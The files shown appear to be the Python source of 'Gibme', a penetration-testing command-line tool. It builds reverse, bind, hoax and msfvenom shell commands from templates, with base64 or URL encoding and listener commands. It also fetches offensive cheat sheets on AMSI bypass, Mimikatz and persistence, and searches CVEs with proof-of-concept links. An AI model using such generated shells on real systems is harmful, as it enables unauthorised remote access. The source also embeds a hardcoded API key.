import urllib.parse
import base64

from .shell_data import (
    reverse_shell,
    bind_shell,
    hoax_shell,
    shells,
    msfvenom,
    listenerCommands,
)
from rich.console import Console
from rich.table import Table
from rich.text import Text


def generate_shell(
    shell_names: list,
    shell_type: str,
    ip_address: str,
    port_number: str,
    operating_system: str,
    shell: str,
    encode: str = None,
    listener: str = None,
):
    """
    Generate shell commands based on the given parameters.

    Args:
        shell_names (list): List of shell names.
        shell_type (str): Type of shell (reverse, bind, hoax, msfvenom).
        ip_address (str): IP address for the shell.
        port_number (str): Port number for the shell.
        operating_system (str): Operating system for the shell.
        shell (str): Shell type (e.g., bash, powershell, python).
        encode (str, optional): Encoding type for the shell command. Defaults to None.
        listener (str, optional): Listener name for reverse shell. Defaults to None.

    Returns:
        None
    """
    listener_text = None
    if listener:
        for each_listener in listenerCommands:
            if each_listener[0] == listener:
                try:
                    listener_text = each_listener[1].format(port=port_number)
                except Exception:
                    listener_text = each_listener[1].replace("{port}", port_number)

    for name in shell_names:
        if shell_type == "reverse":
            for each_shell in reverse_shell:
                shell_command_encoded = None
                if each_shell["name"] == name[0]:
                    if (
                        operating_system != "all"
                        and operating_system not in each_shell["meta"]
                    ):
                        continue
                    try:
                        shell_command = each_shell["command"].format(
                            ip=ip_address, port=port_number, shell=shell
                        )
                        if encode:
                            shell_command_encoded = encode_str(shell_command, encode)
                    except Exception:
                        shell_command = (
                            each_shell["command"]
                            .replace("{ip}", ip_address)
                            .replace("{port}", port_number)
                            .replace("{shell}", shell)
                        )
                        if encode:
                            shell_command_encoded = encode_str(shell_command, encode)
                    for _i in each_shell["meta"]:
                        os_string = ", ".join(each_shell["meta"])

                    _print_shell(
                        name=name[0],
                        shell_command=shell_command,
                        os_string=os_string,
                        encoded=shell_command_encoded,
                        listener_text=listener_text,
                    )

        elif shell_type == "bind":
            for each_shell in bind_shell:
                if each_shell["name"] == name[0]:
                    try:
                        shell_command = each_shell["command"].format(port=port_number)
                    except Exception:
                        shell_command = each_shell["command"].replace(
                            "{port}", port_number
                        )
                    os_string = "Linux, Windows, Mac"

                    _print_shell(
                        name=name[0],
                        shell_command=shell_command,
                        os_string=os_string,
                        listener_text=listener_text,
                    )

        elif shell_type == "hoax":
            for each_shell in hoax_shell:
                if each_shell["name"] == name[0]:
                    try:
                        shell_command = each_shell["command"].format(
                            ip=ip_address, port=port_number
                        )
                    except Exception:
                        shell_command = (
                            each_shell["command"]
                            .replace("{ip}", ip_address)
                            .replace("{port}", port_number)
                        )
                    os_string = "Windows"

                    _print_shell(
                        name=name[0],
                        shell_command=shell_command,
                        os_string=os_string,
                        listener_text=listener_text,
                    )

        elif shell_type == "msfvenom":
            for each_shell in msfvenom:
                if each_shell["name"] == name[0]:
                    try:
                        shell_command = each_shell["command"].format(
                            ip=ip_address, port=port_number
                        )
                    except Exception:
                        shell_command = (
                            each_shell["command"]
                            .replace("{ip}", ip_address)
                            .replace("{port}", port_number)
                        )
                    os_string = "Linux, Windows, Mac"

                    _print_shell(
                        name=name[0],
                        shell_command=shell_command,
                        os_string=os_string,
                        listener_text=listener_text,
                    )


def _print_shell(
    name: str,
    shell_command: str,
    os_string: str,
    listener_text: str = None,
    encoded: str = None,
):
    """
    Print the details of a reverse shell.

    Args:
        name (str): The name of the reverse shell.
        shell_command (str): The shell command to execute.
        os_string (str): The operating system string.
        listener_text (str, optional): The listener command. Defaults to None.
        encoded (str, optional): The encoded shell command. Defaults to None.
    """
    # Initialize console
    console = Console()

    # Prepare shell details
    shell_details = (
        Text("\nReverse Shell: ", style="bold")
        + Text(name, style="cyan")
        + Text(" | OS: ", style="bold")
        + Text(os_string, style="cyan")
    )

    # Prepare shell command
    shell_command_text = Text("\nCommand:\n", style="bold") + Text(
        shell_command, style="green"
    )

    # Print shell details and command
    console.print(shell_details)
    console.print(shell_command_text)

    # Encode the shell command if required
    if encoded:
        shell_command_encoded_text = Text("\nEncoded:\n", style="bold") + Text(
            encoded, style="yellow"
        )
        console.print(shell_command_encoded_text)

    # Print listener command
    if listener_text:
        listener_command_text = Text("\nListener:\n", style="bold") + Text(
            listener_text, style="red"
        )
        console.print(listener_command_text)

    # Print separator
    console.print("\n")
    console.print(Text("=" * 50, style="dim"))
    console.print("\n")


def encode_str(text: str, encode_type: str):
    """
    Encode a string using the specified encoding type.

    Args:
        text (str): The string to be encoded.
        encode_type (str): The encoding type to be used. Valid options are "base64" and "url".

    Returns:
        str: The encoded string.

    Raises:
        ValueError: If an invalid encoding type is provided.
    """
    if encode_type == "base64":
        return base64.b64encode(text.encode()).decode()
    elif encode_type == "url":
        return urllib.parse.quote(text)
    else:
        raise ValueError("Invalid encoding type. Valid options are 'base64' and 'url'.")


def list_shells():
    """
    List all available shells.

    This function prints a table of available shells, including their type, name, and metadata.

    Args:
        None

    Returns:
        None
    """
    console = Console()
    table = Table(show_header=True, header_style="bold magenta")
    table.add_column("Type", style="yellow")
    table.add_column("Shell Name", style="cyan")
    table.add_column("Meta", style="blue")

    for shell_type, shells in [
        ("Reverse", reverse_shell),
        ("Bind", bind_shell),
        ("Hoax", hoax_shell),
        ("MSFVenom", msfvenom),
    ]:
        for shell in shells:
            table.add_row(shell_type, shell["name"], ", ".join(shell["meta"]))

    console.print(table)


def list_listeners():
    """
    Display a table of listeners and their corresponding commands.

    This function prints a table with two columns: Listener Name and Command.
    It iterates over the `listenerCommands` list and adds each listener's name
    and command to the table. The table is then printed to the console.
    """
    console = Console()
    table = Table(show_header=True, header_style="bold magenta")
    table.add_column("Listener Name", style="cyan")
    table.add_column("Command", style="green")

    for listener in listenerCommands:
        table.add_row(listener[0], listener[1])

    console.print(table)



from textual.screen import Screen
from textual.app import ComposeResult
from textual.widgets import Markdown, Header, Footer

class Cheat(Screen):
    BINDINGS = [("escape,space,q,question_mark", "pop_screen", "Close")]

    COMING_SOON_MARKDOWN = """\
# Pentesting Cheatsheet Screen

This screen will provide a searchable cheatsheet for various pentesting subjects.

## Coming Soon

Stay tuned for more updates!
"""

    def compose(self) -> ComposeResult:
        yield Header()
        yield Footer()
        yield Markdown(self.COMING_SOON_MARKDOWN)

    async def on_mount(self) -> None:
        """Called when app starts."""
        self.title = "Gibme"
        self.sub_title = "Cheat Sheet"


import httpx
import asyncio
import json
import platform
import os
import sys

from pathlib import Path
from rich.console import Console
from rich.markdown import Markdown
from rich.tree import Tree

default_notes_links = [
    {
        "name": "Active Directory Attack.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md",
    },
    {
        "name": "Cloud - AWS Pentest.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md",
    },
    {
        "name": "Cloud - Azure Pentest.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md",
    },
    {
        "name": "Cobalt Strike - Cheatsheet.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md",
    },
    {
        "name": "Linux - Evasion.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Evasion.md",
    },
    {
        "name": "Linux - Persistence.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md",
    },
    {
        "name": "Linux - Privilege Escalation.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md",
    },
    {
        "name": "Metasploit - Cheatsheet.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md",
    },
    {
        "name": "Methodology and enumeration.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md",
    },
    {
        "name": "Network Pivoting Techniques.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md",
    },
    {
        "name": "Network Discovery.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Network%20Discovery.md",
    },
    {
        "name": "Reverse Shell Cheatsheet.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md",
    },
    {
        "name": "Subdomains Enumeration.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md",
    },
    {
        "name": "Windows - AMSI Bypass.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md",
    },
    {
        "name": "Windows - DPAPI.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md",
    },
    {
        "name": "Windows - Download and Execute.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md",
    },
    {
        "name": "Windows - Mimikatz.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md",
    },
    {
        "name": "Windows - Persistence.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md",
    },
    {
        "name": "Windows - Privilege Escalation.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md",
    },
    {
        "name": "Using credentials.md",
        "link": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md",
    },
]


async def download_file(url: str, dest: Path):
    """
    Downloads a file from the specified URL and saves it to the destination path.

    Args:
        url (str): The URL of the file to download.
        dest (Path): The destination path where the file will be saved.

    Raises:
        Any exceptions that occur during the download process.

    Returns:
        None
    """
    async with httpx.AsyncClient() as session:
        response = await session.get(url)
        dest.write_text(response.text, encoding="utf-8")


async def get_notes(note_dir: Path, notes: list):
    """
    Downloads notes from a list of URLs and saves them to the specified directory.

    Args:
        note_dir (Path): The directory where the notes will be saved.
        notes (list): A list of dictionaries containing the notes' information, including the URL and filename.

    Returns:
        None
    """
    tasks = []
    for note in notes:
        url = note["link"]
        filename = note["name"]
        dest = note_dir / filename
        tasks.append(download_file(url, dest))
    await asyncio.gather(*tasks)


def download_default_notes(note_dir: Path):
    """
    Downloads default notes from the specified directory.

    Args:
        note_dir (Path): The directory where the notes will be downloaded.

    Returns:
        None
    """
    asyncio.run(get_notes(note_dir, default_notes_links))


def print_note(home_dir: Path, note_name: str, note_mode: str):
    """
    Print the contents of a note file.

    Args:
        home_dir (Path): The home directory.
        note_name (str): The name of the note file.
        note_mode (str): The mode of the note file (default or custom).
    """
    settings_file = home_dir / "settings.json"
    with settings_file.open() as f:
        settings = json.load(f)
        default_note_dir = Path(settings["default_notes_dir"])
        custom_notes_dir = settings["custom_notes_dir"]

    if note_mode == "default":
        note_file_path = next(
            (
                Path(root) / note_name
                for root, dirs, files in os.walk(default_note_dir)
                if note_name in files
            ),
            None,
        )
    elif note_mode == "custom":
        note_file_path = next(
            (
                Path(root) / note_name
                for root, dirs, files in os.walk(custom_notes_dir)
                if note_name in files
            ),
            None,
        )

    if not note_file_path:
        console = Console()
        console.print(
            f"[bold red]Error: [bold]'{note_name}'[bold red] not found in '{note_mode}' directory."
        )
        sys.exit(0)

    console = Console(force_terminal=True, legacy_windows=True)
    markdown = Path(note_file_path).read_text(encoding="utf-8")
    try:
        # Set the PAGER environment variable to less -R for rich markdown support
        if "PAGER" not in os.environ and platform.system() != "Windows":
            os.environ["PAGER"] = "less -R"
        with console.pager(styles=True):
            console.print(Markdown(markdown))
    except KeyboardInterrupt:
        console.print("\n[bold red]Exiting program.")


def list_notes(home_dir: Path):
    """
    List the notes in the default and custom directories.

    Args:
        home_dir (Path): The home directory where the settings file is located.

    Returns:
        None
    """
    # get default_notes_dir and custom_notes_dir from settings.json
    settings_file = home_dir / "settings.json"
    with settings_file.open() as f:
        settings = json.load(f)
        default_note_dir = Path(settings["default_notes_dir"])
        custom_notes_dir = settings["custom_notes_dir"]

    default_tree = _get_notes_tree(
        default_note_dir, "[bold magenta]Default Directory ("
    )
    # Check if custom_notes_dir is not empty
    if custom_notes_dir:
        custom_notes_dir = Path(custom_notes_dir)

        custom_tree = _get_notes_tree(
            custom_notes_dir, "[bold magenta]Custom Directory ("
        )
        # Print the custom tree
        console = Console()
        console.print(custom_tree)

    # Print the default tree
    console = Console()
    console.print(default_tree)


def _get_notes_tree(directory: Path, header_style: str) -> Tree:
    """
    Generate a tree structure representing the notes directory.

    Args:
        directory (Path): The directory to generate the tree from.
        header_style (str): The style of the header for the tree.

    Returns:
        Tree: The generated tree structure.
    """
    # Walk the custom directory and add all the folders and files to the tree
    custom_directory_dict = walk_directory(directory)
    result = Tree(f"{header_style}{directory})")
    for folder, files in custom_directory_dict.items():
        folder_node = result.add(f"[green]{folder}")
        for file in files:
            folder_node.add(f"[blue]{file}")
    return result


def walk_directory(directory: Path) -> dict:
    """
    Recursively walks through a directory and returns a dictionary
    containing the names of the subdirectories as keys and a list of
    files in each subdirectory as values.

    Args:
        directory (Path): The directory to walk through.

    Returns:
        dict: A dictionary containing the names of the subdirectories
        as keys and a list of files in each subdirectory as values.
    """
    return {Path(root).name: files for root, dirs, files in os.walk(directory)}



from textual import work
from textual.app import ComposeResult
from textual.screen import Screen
from textual.widgets import Markdown, Input, Header, ListView, ListItem, Markdown, Footer
from textual.containers import VerticalScroll, Container
from meilisearch_python_sdk import AsyncClient
from meilisearch_python_sdk.models.search import Hybrid

class CVE(Screen):
    
        BINDINGS = [("escape", "pop_screen", "Close")]
    
        def compose(self) -> ComposeResult:
            yield Header()
            yield Footer()
            yield Input(placeholder="Search for CVEs")
            with Container(id="app-grid"):
                with VerticalScroll(id="left-pane"):
                    yield ListView(id="cve-list")

                with VerticalScroll(id="right-pane"):
                    yield Markdown(id="results")


        async def on_mount(self) -> None:
            """Called when app starts."""
            self.query_one(Input).focus()
            self.title = "Gibme"
            self.sub_title = "CVE Search"
            self.result = None
        
        async def on_input_changed(self, message: Input.Changed) -> None:
            if message.value:
                self.search_cve(message.value)
                
        async def on_list_view_selected(self, event: ListView.Selected) -> None:
            cve_id = event.item.children[0].id
            await self.display_results(cve_id)

        async def display_results(self, cve_id: str) -> None:
            cve = [cve for cve in self.result if cve["id"] == cve_id]
            if cve:
                cve = cve[0]
                description = cve.get('description', '')
                references = '\n'.join(['- ' + ref for ref in cve.get('references', [])])
                poc_references = '\n'.join(['- ' + ref for ref in cve.get('poc', {}).get('reference', [])])
                github_links = '\n'.join(['- ' + link for link in cve.get('poc', {}).get('github', [])])
                self.query_one("#results", Markdown).update(f"**ID:** {cve['id']}\n\n**Description:**\n{description}\n\n**References:**\n{references}\n\n**Proof of Concept References:**\n{poc_references}\n\n**GitHub Links:**\n{github_links}")
            else:
                self.query_one("#results", Markdown).update(f"**{cve_id}** not found")
            

        @work(exclusive=True)    
        async def search_cve(self, query: str) -> None:
            url = "https://cve.teecybervault.com"
            search_key = "531c533fe69dd6af154008aa1d62a1f19df34233c21bbff168a26a130e6dab16"
            try:
                async with AsyncClient(url=url, api_key=search_key) as client:
                    index = client.index("cve")
                    hybrid = Hybrid(semantic_ratio=0.5, embedder="default")
                    response = await index.search(query, limit=30, hybrid=hybrid)
                    self.result = response.hits
                    
            except Exception as e:
                self.query_one("#results", Markdown).update(f"**Error:** {e}")
                
            if self.result:
                await self.populate_list_view(self.result)

        async def populate_list_view(self, cve_list: list) -> None:
            # parse id and description from cve_list
            cve_list = [(cve["id"], cve.get("description", "")) for cve in cve_list if "id" in cve]
            list_view = self.query_one("#cve-list", ListView)
            list_view.clear()
            list_view.extend([ListItem(Markdown(f'**{cve_id}**\n\n{description[:100]}...', id=cve_id)) for cve_id, description in cve_list])
            list_view.index = 0
            await self.display_results(cve_list[0][0])


import httpx
from textual import work
from textual.app import ComposeResult
from textual.screen import Screen
from textual.widgets import Markdown, Input, Header, Checkbox, Footer
from textual.containers import VerticalScroll, Horizontal
from rapidfuzz import process, fuzz, utils as fuzz_utils

class TLDR(Screen):

    BINDINGS = [("escape", "pop_screen", "Close")]

    def compose(self) -> ComposeResult:
        yield Header()
        yield Footer()
        yield Input(placeholder="Search for TLDR Pages")
        with Horizontal(id="checkbox"):
            yield Checkbox("Common", "True", id="common")
            yield Checkbox("Linux", id="linux")
            yield Checkbox("MacOSX", id="macosx")
            yield Checkbox("Windows", id="windows")
            yield Checkbox("Android", id="android")
            yield Checkbox("OpenBSD", id="openbsd")
            yield Checkbox("FreeBSD", id="freebsd")
            yield Checkbox("Sunos", id="sunos")
            yield Checkbox("NetBSD", id="netbsd")

        with VerticalScroll(id="results-container"):
            yield Markdown(id="results")

    async def on_mount(self) -> None:
        """Called when app starts."""
        self.query_one(Input).focus()
        self.title = "Gibme"
        self.sub_title = "TLDR Lookup"
        self.tldr_dict = await self.get_tldr()

    async def on_checkbox_changed(self) -> None:
        checkboxes = self.query(Checkbox)
        self.checked_boxes = [checkbox.id for checkbox in checkboxes if checkbox.value]

    async def on_input_changed(self, message: Input.Changed) -> None:
        if message.value:
            checkboxes = self.query(Checkbox)
            self.checked_boxes = [checkbox.id for checkbox in checkboxes if checkbox.value]
            
            # Filter the platforms based on the checked boxes
            platforms_to_fuzz = {platform: pages for platform, pages in self.tldr_dict.items() if platform in self.checked_boxes}
            
            # Fuzz the names in the filtered platforms
            fuzzed_names = await self.fuzz_tldr(message.value, platforms_to_fuzz)
            
            if len(fuzzed_names) == 0:
                self.query_one("#results", Markdown).update(f"**Not Found**")
            elif len(fuzzed_names) == 1 and len(fuzzed_names[0]) == 2:
                self.get_tldr_info(fuzzed_names[0])
            else:
                self.query_one("#results", Markdown).update(self.fuzz_result_markdown(fuzzed_names))
        else:
            # Clear the results
            self.query_one("#results", Markdown).update("")

    @work(exclusive=True)
    async def get_tldr_info(self, tldr_name: tuple) -> None:
        raw_url = f"https://raw.githubusercontent.com/tldr-pages/tldr/master/pages/{tldr_name[1]}/{tldr_name[0]}.md"
        async with httpx.AsyncClient() as client:
            try:
                response = await client.get(raw_url)
                self.query_one("#results", Markdown).update(response.text)
            except Exception as e:
                self.query_one("#results", Markdown).update(f"**{tldr_name[0]}**\n\n**{tldr_name[1]}**\n\nNot Found\n\nError: {e}")

    async def fuzz_tldr(self, tldr_name: str, platforms_to_fuzz: dict) -> list:
        # Initialize an empty list for the results
        results = []

        # Iterate over the platforms and their pages
        for platform, pages in platforms_to_fuzz.items():
            # Use fuzzy matching to find the best matches for tldr_name in the pages
            matches = process.extract(
                tldr_name, 
                pages, 
                scorer=fuzz.ratio,
                limit=10,
                score_cutoff=70,
                processor=fuzz_utils.default_process,
            )

            # Add the platform to the matches and append them to the results
            results.extend((match, score, platform) for match, score, _ in matches)

        if results:
            highest_similarity = max(results, key=lambda x: x[1])
            if highest_similarity[1] > 90:
                return [(highest_similarity[0], highest_similarity[2])]
            else:
                return results
        else:
            return results

    async def get_tldr(self) -> dict:
        """Get the list of tldr pages."""
        tldr_dict = {}
        async with httpx.AsyncClient() as client:
            response = await client.get("https://tldr.sh/assets/index.json")
            data = response.json()
            for command in data["commands"]:
                for platform in command["platform"]:
                    if platform not in tldr_dict:
                        tldr_dict[platform] = []
                    tldr_dict[platform].append(command["name"])
        return tldr_dict
    
    def fuzz_result_markdown(self, results: list) -> str:
        markdown = ""
        for result in results:
            markdown += f"**{result[0]}**\n\n"
        return markdown


#!/usr/bin/env python3

import argparse
import signal
import sys

from modules.utils import update_gibme, check_init, fuzz_name
from modules.gtfobins import list_bins, gtfobins_info
from modules.lolbas import list_exe, lolbas_info
from modules.shellgen import generate_shell, list_listeners, list_shells
from modules.shell_data import listenerCommands, shells
from modules.cheatsheet import list_notes, print_note
from modules.tldr import tldr
from rich import print


def signal_handler(signal, frame):
    print("[red]\n\nYou pressed Ctrl+C![/red]")
    sys.exit(0)


def main():
    parser = argparse.ArgumentParser(
        description="gibme - Your CLI tool for generating shells, searching binaries, and more.",
        epilog="""
    Examples:
    gibme -u        Update Gibme.
    gibme -b less   Search for the binary 'less' on GTFOBins.
    gibme -e cmd    Search for the executable 'cmd' on LOLBAS.
    gibme -rs bash  Generate a reverse shell for bash.
    gibme -bs bash  Generate a bind shell for bash.
    gibme -rs bash -i 10.10.11.12 -p 9000 -os linux -s /bin/bash -en base64 -l nc   Generate a reverse shell for bash with the specified options.
    gibme -n default "Active Directory"     Print the default note for "Active Directory".
    gibme -t ssh        Print the cheat sheet for ssh. 
    gibme -ls bins      List all the available binaries.
    gibme -ls notes     List all the available notes.
    """,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    group = parser.add_argument_group("commands")
    group.add_argument(
        "-b", "--bins", metavar="<binary>", help="Search binaries on GTFOBins."
    )
    group.add_argument(
        "-e", "--exe", metavar="<exe>", help="Search Windows exe on LOLBAS."
    )
    group.add_argument(
        "-rs", "--reverse_shell", metavar="<shell>", help="Generate a reverse shell."
    )
    group.add_argument(
        "-hs", "--hoax_shell", metavar="<shell>", help="Generate a hoax shell."
    )
    group.add_argument(
        "-bs", "--bind_shell", metavar="<shell>", help="Generate a bind shell."
    )
    group.add_argument(
        "-msfvenom", metavar="<shell>", help="Generate a msfvenom payload."
    )
    group.add_argument(
        "-ls",
        "--list",
        metavar="<list>",
        help="List all the available binaries or shell.",
        choices=["bins", "exe", "reverse_shells", "listeners", "notes"],
    )
    group.add_argument(
        "-n",
        "--notes",
        nargs=2,
        metavar=("<default or custom>", "<filename>"),
        required=False,
        help="Print the note. Provide either 'default' or 'custom' as the first argument and the file name as the second argument.",
    )
    group.add_argument(
        "-t",
        "--tldr",
        nargs=1,
        metavar=("<command>"),
        required=False,
        help="Print the cheat sheet. Provide the operating system as the first argument (optional) and the command as the second argument.",
    )
    parser.add_argument(
        "-u",
        "--update",
        required=False,
        action="store_true",
        help="Update the binaries and executables.",
    )
    parser.add_argument(
        "-s",
        "--shell",
        required=False,
        default="/bin/sh",
        metavar="<shell>",
        help="Specify shell, default is /bin/sh.",
        choices=shells,
    )
    parser.add_argument(
        "-ip",
        "--ip_address",
        required=False,
        default="10.10.10.10",
        metavar="<ip>",
        help="Specify IP address for reverse shell.",
    )
    parser.add_argument(
        "-p",
        "--port",
        required=False,
        default="9000",
        metavar="<port>",
        help="Specify port for reverse shell.",
    )
    parser.add_argument(
        "-os",
        "--operating_system",
        nargs='*',
        default=[None],
        metavar="<os>",
        help="Specify Operating System for reverse shell or tldr command.",
        choices=["android", "freebsd", "linux", "netbsd", "openbsd", "osx", "sunos", "windows", None],
    )
    parser.add_argument(
        "-en",
        "--encode",
        required=False,
        default="",
        metavar="<encode>",
        help="Specify encoding for reverse shell.",
        choices=["base64", "url"],
    )
    parser.add_argument(
        "-l",
        "--listener",
        required=False,
        default="",
        metavar="<listener>",
        help="Specify listener for reverse shell.",
        choices=[command[0] for command in listenerCommands],
    )
    parser.add_argument(
        "-v",
        "--version",
        required=False,
        action="store_true",
        help="Show version.",
    )

    args = parser.parse_args()

    home_dir = check_init()

    if args.bins:
        name = fuzz_name(name=args.bins, type_str="gtfobins", home_dir=home_dir)
        gtfobins_info(str(name[0][0]))

    if args.exe:
        name = fuzz_name(name=args.exe, type_str="lolbas", home_dir=home_dir)
        lolbas_info(str(name[0][0]), home_dir)

    if args.list == "bins":
        list_bins(home_dir)
    elif args.list == "exe":
        list_exe(home_dir)
    elif args.list == "reverse_shells":
        list_shells()
    elif args.list == "listeners":
        list_listeners()
    elif args.list == "notes":
        list_notes(home_dir)

    if args.update:
        update_gibme()

    if args.reverse_shell:
        if args.operating_system[0] is None:
            os = "all"

        elif args.operating_system[0].lower() == "linux":
            os = "linux"

        elif args.operating_system[0].lower() == "windows":
            os = "windows"

        elif args.operating_system[0].lower() == "mac":
            os = "mac"

        name_list = fuzz_name(name=args.reverse_shell, type_str="reverse")
        generate_shell(
            shell_names=name_list,
            shell_type="reverse",
            ip_address=args.ip_address,
            port_number=args.port,
            operating_system=os,
            shell=args.shell,
            encode=args.encode,
            listener=args.listener,
        )

    if args.bind_shell:
        name_list = fuzz_name(name=args.bind_shell, type_str="bind")
        generate_shell(
            shell_names=name_list,
            shell_type="bind",
            ip_address=None,
            port_number=args.port,
            operating_system=None,
            shell=None,
            listener=args.listener,
        )

    if args.msfvenom:
        name_list = fuzz_name(name=args.msfvenom, type_str="msfvenom")
        generate_shell(
            shell_names=name_list,
            shell_type="msfvenom",
            ip_address=args.ip_address,
            port_number=args.port,
            operating_system=None,
            shell=None,
            listener=args.listener,
        )

    if args.hoax_shell:
        name_list = fuzz_name(name=args.hoax_shell, type_str="hoax")
        generate_shell(
            shell_names=name_list,
            shell_type="hoax",
            ip_address=args.ip_address,
            port_number=args.port,
            operating_system=None,
            shell=None,
            listener=args.listener,
        )

    if args.notes:
        name = fuzz_name(
            name=args.notes[1],
            type_str="notes",
            choice_path=args.notes[0],
            home_dir=home_dir,
        )
        print_note(home_dir=home_dir, note_name=name[0], note_mode=args.notes[0])

    if args.tldr:
        operating_system = args.operating_system[0] if args.operating_system else None
        command = args.tldr[-1]  # the command is always the last argument

        tldr_result = tldr(
            home_dir=home_dir,
            operating_system=operating_system,
            args=command,
        )
        tldr_result.run()

    if args.version:
        print("[bold cyan]Gibme v0.1.0[/bold cyan]")

if __name__ == "__main__":
    signal.signal(signal.SIGINT, signal_handler)
    main()



import httpx
import json
import platform
import os

from pathlib import Path
from rich.console import Console
from rich.prompt import Prompt
from rich.table import Table
from rich.markdown import Markdown
from rich.table import Table

from rapidfuzz import process, fuzz, utils as fuzz_utils

class tldr:
    def __init__(self, home_dir: Path = None, operating_system: str = None, args: str = None):
        self.console = Console(force_terminal=True, legacy_windows=True)
        self.operating_system = operating_system
        self.args = args
        home_dir_path = Path(home_dir)
        tags_list_path = home_dir_path / "tags.json"


        # Load the tags.json file
        with open(tags_list_path, 'r') as f:
            self.tags_list = json.load(f)

        if self.operating_system is None:
            list_operating_system = ['linux', 'common']
        else:
            list_operating_system = [self.operating_system]

        if os_data := next(
            (item for item in self.tags_list if any(os in item.keys() for os in list_operating_system)), None
        ):
            self.tags = [file['tag'] for os in list_operating_system for file in os_data.get(os, [])]
            self.file_names = [file['filename'] for os in list_operating_system for file in os_data.get(os, [])]
        else:
            self.tags = []
            self.file_names = []

    def run(self):
        found = self.search_tldr() if len(self.args.split(" ")) == 1 else None
        if not found:
            found = self.fuzz_search()

        if not found:
            self.console.print("\n[bold red]The command is not found.")
            return None

        get_tldr = self.get_tldr(found)
        if get_tldr is None:
            self.console.print("\n[bold red]Error: tldr is not found. Check your connection or try again later.")
        else:
            self.print_tldr(get_tldr)

    def get_tldr(self, file_name: str):
        base_url = "https://raw.githubusercontent.com/tldr-pages/tldr/master/pages/"
        os_list = [self.operating_system] if isinstance(self.operating_system, str) else (self.operating_system or ["linux", "common"])

        with httpx.Client() as client:
            for os in os_list:
                url = f"{base_url}{os}/{file_name}"
                response = client.get(url)
                if response.status_code == 200:
                    return response.text
        return None

    def print_tldr(self, markdown: str):
        try:
            if "PAGER" not in os.environ and platform.system() != "Windows":
                os.environ["PAGER"] = "less -R"
            with self.console.pager(styles=True):
                self.console.print(Markdown(markdown))
        except KeyboardInterrupt:
            self.console.print("\n[bold red]Exiting program.")

    def search_tldr(self):
        names_with_ext = {os.path.splitext(filename)[0]: filename for filename in self.file_names}
        return names_with_ext.get(self.args, None)
    
    def fuzz_search(self):
        results_filenames = []
        for os_data in self.tags_list:
            if self.operating_system and self.operating_system in os_data:
                for file_dict in os_data.get(self.operating_system, []):
                    file_tags = file_dict.get('tag', '')
                    score = process.extractOne(self.args, [file_tags], scorer=fuzz.token_set_ratio ,processor=fuzz_utils.default_process)
                    if score[1] > 90:
                        results_filenames.append(file_dict['filename'])
            elif 'common' in os_data:
                for file_dict in os_data.get('common', []):
                    file_tags = file_dict.get('tag', '')
                    score = process.extractOne(self.args, [file_tags], scorer=fuzz.token_set_ratio ,processor=fuzz_utils.default_process)
                    if score[1] > 90:
                        results_filenames.append(file_dict['filename'])

        if results_filenames: 
            if len(results_filenames) > 1:
                return self.user_select(results_filenames)[0]
            else: 
                return results_filenames[0] 
        return None

    def user_select(self, choice_list) -> list:
        self.console.print("[bold cyan]Please choose one of the following options:")
        if len(choice_list) <= 1:
            return [choice_list[0]]  # Return a list containing the single element
        options = {str(i): f"{i}. {n[:-3]}" for i, n in enumerate(choice_list, start=1)}  # Strip .md from each filename

        if len(options) > 70:
            if Prompt.ask("The result is over 70. Do you want to continue?", choices=["yes", "no"], default="no") == "no":
                return []

        table = Table(show_header=False, padding=(0, 2))
        for i in range(0, len(options), 3):  # Adjust the range step to change the number of columns
            table.add_row(*[options.get(str(j), "") for j in range(i+1, i+4)])

        self.console.print(table)

        selected = Prompt.ask("Your choice:", choices=options.keys())
        return [
            choice_list[int(selected) - 1]
        ]


hoax_shell = [
    {
        "name": "Windows CMD cURL",
